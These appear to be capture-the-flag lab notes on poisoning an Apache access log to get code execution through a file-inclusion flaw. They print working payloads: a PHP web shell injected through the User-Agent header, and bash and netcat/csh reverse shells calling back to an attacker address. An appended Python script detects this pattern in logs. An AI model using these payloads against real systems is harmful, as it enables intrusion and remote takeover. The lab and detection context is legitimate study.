Apache log
Example from 10.10.10.84
The URL http://10.10.10.84/browse.php?file=/var/log/httpd-access.log exposes the Apache log files:
Error message when contaminating the log with:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/3333 0>&1'");?>
Second try (the reason for the error message was that the " character could not be processed by the log file). Changing to:
User-Agent: <?php system($_REQUEST['cmd']); ?>
We gain code execution through LFI:
The same request in Burp (useful when log files are full of data)
Gaining a reverse shell from FreeBSD through LFI with:
if [ -e /tmp/OGfWimIImwJMI ];then rm /tmp/OGfWimIImwJMI;fi;mkfifo /tmp/OGfWimIImwJMI;cat /tmp/OGfWimIImwJMI|/bin/csh -i 2>&1|nc 10.10.14.20 3333 > /tmp/OGfWimIImwJMI
Mind the /bin/csh, as users on this box do not have bash!
Make sure you URL encode the command in Burp before sending:
Result:
Reference:
Shellpop - allowed me to construct the reverse shell for FreeBSD.
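Detection side of the technique above, as an added example that is not part of the original notes: a Python scan of Apache combined-format access-log lines that flags PHP open tags in client-controlled fields and requests that pass a log path in a parameter. The sample lines, addresses, regexes and function names are constructed for illustration; the log format is assumed to be the default combined format.

```python
import re
from urllib.parse import unquote

# A quoted log field; Apache writes a literal " inside a field as \" so allow escapes.
Q = r'"((?:[^"\\]|\\.)*)"'
# Combined format: host ident user [time] "request" status size "referer" "user-agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + Q + r' (\d{3}) \S+ ' + Q + ' ' + Q + r'$')
# PHP open tags have no business in a request line, Referer or User-Agent.
PHP_TAG = re.compile(r'<\?(php|=)', re.I)
# A parameter value that points at a log file (heuristic chosen for this example).
LOG_INCLUDE = re.compile(r'[?&][^=&]+=[^&\s]*(/var/log/|access[._-]?log|error[._-]?log)', re.I)

def classify(line):
    """Return the list of findings for one access-log line (empty list = clean)."""
    m = LINE.match(line)
    if not m:
        return ["unparseable"]
    _ip, _ts, request, _status, referer, agent = m.groups()
    findings = []
    for name, value in (("request", request), ("referer", referer), ("user-agent", agent)):
        # Decode %xx first so URL-encoded tags are caught as well.
        if PHP_TAG.search(unquote(value)):
            findings.append("php-tag-in-" + name)
    if LOG_INCLUDE.search(unquote(request)):
        findings.append("log-file-in-parameter")
    return findings

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    return [(i, f) for i, l in enumerate(lines, 1) if (f := classify(l))]

# Constructed sample lines (documentation addresses, not taken from the target's log).
SAMPLE = r'''
192.0.2.10 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; FreeBSD amd64)"
192.0.2.66 - - [10/Mar/2024:10:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_REQUEST['cmd']); ?>"
192.0.2.66 - - [10/Mar/2024:10:02:40 +0000] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 9000 "-" "curl/8.0"
192.0.2.11 - - [10/Mar/2024:10:05:00 +0000] "GET /about.php HTTP/1.1" 200 700 "-" "Agent \"beta\" 1.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE):
        print(lineno, ", ".join(findings))
```

A PHP tag in a logged header followed by a request that names the log file in a parameter is the sequence shown on this page, so the two findings are most useful when correlated by source address.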